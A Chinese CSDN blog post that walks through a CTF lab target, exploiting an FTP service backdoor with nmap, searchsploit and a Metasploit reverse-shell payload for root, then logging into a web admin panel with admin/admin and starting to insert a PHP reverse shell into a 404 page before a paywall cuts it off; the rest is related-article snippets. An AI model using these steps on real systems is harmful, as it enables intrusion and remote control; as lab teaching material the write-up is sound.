CTF靶机实战-FTP服务后门

最新推荐文章于 2024-01-18 22:33:36 发布
最新推荐文章于 2024-01-18 22:33:36 发布
阅读量1k 收藏 7
点赞数
文章标签: ftp 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ewige/article/details/106567813
版权

靶场:
和彩云 提取码:hEKo

攻击机:192.168.106.131

1.进行目标主机探测 nmap 192.168.106.1/24
在这里插入图片描述

2.nmap -sV -v -T4 192.168.106.129 扫描目标服务版本详细信息

在这里插入图片描述

2.使用searchsploit [服务版本] 查看有没有可利用的漏洞

在这里插入图片描述

发现了两个利用信息,接下来为了省事(太菜了)使用metssploit进行利用

在这里插入图片描述
这里使用4号建立后门模块

  1. use 4
  2. show payloads 查看可用payload
  3. set payload 3 cmd/unix/reverse 设置反弹shellpayload
  4. show options 查看需要设置的信息,并填写
  5. run 执行远程溢出命令

成功拿到目标shell,而且还是root权限的😁
在这里插入图片描述

使用
python -c "import pty;pty.spawn('/bin/bash')"
优化shell
在这里插入图片描述
3.接下来进入root目录下拿到flag就ok啦

a.回想一下,进行目标端口扫描时发现目标还开启了80端口,那么😁

在这里插入图片描述
b.使用dirb http://192.168.106.129 对目标进行目录扫描
发现管理登入界面
在这里插入图片描述

在这里插入图片描述

c.进行简单尝试后发现 admin admin 居然进了😁

在这里插入图片描述
c.在目标404界面插入反弹shell代码

在这里插入图片描述

/*<?php /**/ error_reporting(0); $ip = '192.168.
最低0.47元/天 解锁文章
岚铭
关注
ftp服务后面漏洞——CTF靶机
panda.
10-24 425
使用metasploit平台扫描查看有无漏洞。使用nmap工具扫描靶机查看端口开放状态。渗透到靶机,并且权限是root权限。首先使用fping扫描靶机ip。发现有漏洞,使用漏洞并配置参数。扫描21端口服务版本信息。
靶机知识点之ftp匿名登陆
不想当脚本小子的脚本小子
05-06 467
因为想做红队 所以我打算靶机方面都要做到最后一步权限维,促进学习; 很久没有玩vulnhub靶机了,过来打一打; 先探测一下靶机的ip:思路——21端口ftp暴力破解 22端口远程登陆 80端口寻找功能点 主页为一张图片 信息收集一下 感觉是拿用户名和密码然后ssh登陆提权找flag,但是似乎目前并没有搜集到什么有用的信息 但是ftp这里我还没有做什么工作 查了一下 发现他允许匿名登陆 去搜了一下相关的知识点(利用nmap -A -v参数即可得到目标具体信息) ...
CTF夺旗-FTP服务后门利用-靶机渗透实战
居上
11-29 786
FTP服务后门利用信息收集检索漏洞漏洞利用 环境 IP: 攻击机:192.168.36.128 靶机:192.168.36.139 链接: https://pan.baidu.com/s/1wMKfK6eLXb_GbkGX2RwXNg 提取码:olrh 信息收集 nmap -sS {ip/netmask} #扫描某个网段下存活的主机 nmap -sV {ip} #扫描目标ip的开放服务以及版本信息 nmap -A -v T4 {ip} #扫描目标ip的全部信息 检索漏洞 searchsploit ProF
黑客内网渗透环境靶机搭建--------FTP服务器搭建
边城浪子的博客
03-15 1186
系统 :windows 2003 step1:"开始 "----"控制面板"----"添加或删除程序"----"应用程序服务器"----"Internet信息服务"----"文件传输协议"----确定 step2:一路安装下去就可以了 step3:“开始”----“管理工具”----“Internet信息服务管理器”----选择“默认FTP站点”右键----“属性”----“安...
NSSCTF刷题笔记web8——[第五空间 2021]WebFTP
最新发布
qq_45692883的博客
01-18 742
扫目录发现了.git文件夹和phpinfo.php。然后直接在phpinfo中找到了flag。有点迷惑行为,可能这题的考点是目录爆破吧。5.看前端源代码有没有泄露些内容。3.webftp2011的漏洞。进去是发现是一个登录界面。
HTB_Fawn 靶机FTP 协议简介
网络安全学习
04-18 1399
🍭 不要焦虑也不要放弃,每天进步一点点 🍭 文章目录FTP 简介如何使用? ps:填空答案已在文中标出 FTP 简介 FTP 文件传输协议( File Transfer Protocol [1] )是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输而不是 UDP,它有两个开放端口,一个是控制端口,一般为 21,一个是数据端口,主动模式为 20,也可以由客户端和服务器商议协定,而 sftp [5] 则是相较于 ftp 更为安.
ctf图文讲解-FTP后门服务利用
weixin_45441727的博客
03-17 711
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机,对靶机进行操作系统版本扫描 nmap -sV 靶机IP 发现21端口版本号为 ProFTPD 1.3.3c 通过searchsploit查看对应版本号漏洞文件 searchsploit ProFTPD 1.3.3c 查看文件 cat /usr/share/exploitdb/exploits/linux/remote/15662.txt 很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法
CTF训练笔记(四)- FTP服务后门利用
morrino的博客
04-19 3093
对于开放了FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码; 对于系统一定要注意利用现成的EXP来拿到靶机root权限。 如果靶机开启了多个服务,貌似有很多不同方法可以拿到root权限,那就用最简单的方法。 本次渗透测试利用了已经存在的EXP直接一步到位地拿到了靶机的root权限,极大地提升了获取flag的速度。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF-FTP后门利用
墨鱼菜鸡
09-10 357
环境 kali 192.168.20.128 靶机 192.168.20.130 链接:https://pan.baidu.com/s/1ymhZ7ZpEHFnorrkguaYMTA 提取码:xb6o 信息探测 发现漏洞 searchsploit cat /usr/share/exploitdb/exploits/linux/r...
CTF训练 FTP服务后门利用(含靶场下载地址)
ZY_Jack的博客
12-25 1203
FTP服务后门利用扫描端口及漏洞msf扫描和漏洞利用 扫描端口及漏洞 攻击机ip:192.168.88.129 靶机ip: 192.168.88.130 nmap -sV 扫描端口 searchsploit ProFTPD 1.3.3c 这节主要介绍ftp端口。使用searchsploit来查看版本ftp服务没有可利用的漏洞。 searchsploit ProFTPD 1.3.3c msfconsole打开metasploit msf扫描和漏洞利用 search ProFTPd-1.3
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3179
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 5034
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测,探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
hack the box靶场fawn靶机
zr1213159840的博客
03-15 3454
首先打开靶机,回答几个问题 第一个问题:ftp的全称是什么? 答案:File Transfer Protocol 第二个问题:ftp协议的通信模型是什么? 答案:一般由bs和cs两种,ftp是cs的,即client-server model 第三个问题:一种流行的ftpgui程序是什么? 答案:搜了半天,是FileZilla,百度搜流行的ftp程序就能找到 第四个问题:ftp跑在哪个端口,基于什么协议? 答案:ftp是跑在tcp协议之上的,其中21是控制端口,20是数据传输端口,所以说服务跑在哪个端
2022年中职“网络安全“江西省赛题—B-6:数据分析(wire0077.pcap)
weixin_57060854的博客
12-29 1785
靶机服务器的FTP上下载数据包文件,分析该文件,找出黑客入侵使用的协议,提交协议名称。分析该文件,找出黑客入侵获取的zip压缩包文件,提交压缩包文件名。分析该文件,找出黑客入侵获取的敏感文件,提交该敏感文件泄露的时间。分析该文件,找出黑客入侵获取的敏感文件,提交敏感文件的文件名。学习交流,或者遇到不会的可以+qq:3455475542。ü FTP用户名:infoacq密码:infoacq。ü 服务器场景:FTPServer(关闭链接)
NMAP高级使用技巧和漏洞扫描发现
weixin_68281676的博客
08-20 8738
NMAP高级使用技巧和漏洞扫描发现
逆向flag0072详解
The end
02-21 641
进去main后观察到有一个解密函数通过异或操作对check验证函数进行了解密,符合SMC代码保护的特征,所以使用了SMC代码保护技术。通过idc脚本对此加密段进行解密后使用动态调试即可看到加密的代码。通过上面的逻辑可知,我们的输入为v4的每一位与1异或。可以看到进去后汇编代码中有一大堆数据段被加密。看看decrypt函数要对谁操作,就是谁了。是check,答案就是check函数的地址。SHIFT+F12可以看到输出字符串。得到解密后的check函数。密钥为异或的16进制数。
江西 网页渗透-21
zx66661的博客
04-25 973
1.访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交; 抓包 更改User-Agent:的内容 Flag:zTdKVpUKJu 2.访问服务器网站目录2,根据页面信息完成条件,将获取到的flag提交; 根据题目要求,添加ip,通过抓包获得flag Flag:6i3zXHDPOx 3.访问服务器网站目录3,根据页面信息完成条件,将获取到的flag提交 发现 payload = id=2' or sleep(3)#
2021 年山东省职业院校技能大赛中职组“网络安全” 赛项
热门推荐
Jay
12-01 1万+
2021 年山东省职业院校技能大赛 中职组“网络安全” 赛项 竞赛题库 网络安全赛项专家组 2021 年 11 月 赛题说明 一、 竞赛时间安排与分值权重 二、 竞赛拓扑图 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3 20% B 网络安全事件响应、 数字取证调查和应用安全 40% C CTF 夺旗-攻击 3 20% D CTF 夺旗-防御 20% 总计 6
使用msfvenom生成后门软件并对靶机进行远程控制
qq_39120795的博客
12-06 4313
如何使用msfvenom生成后门软件并对靶机进行远程控制
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值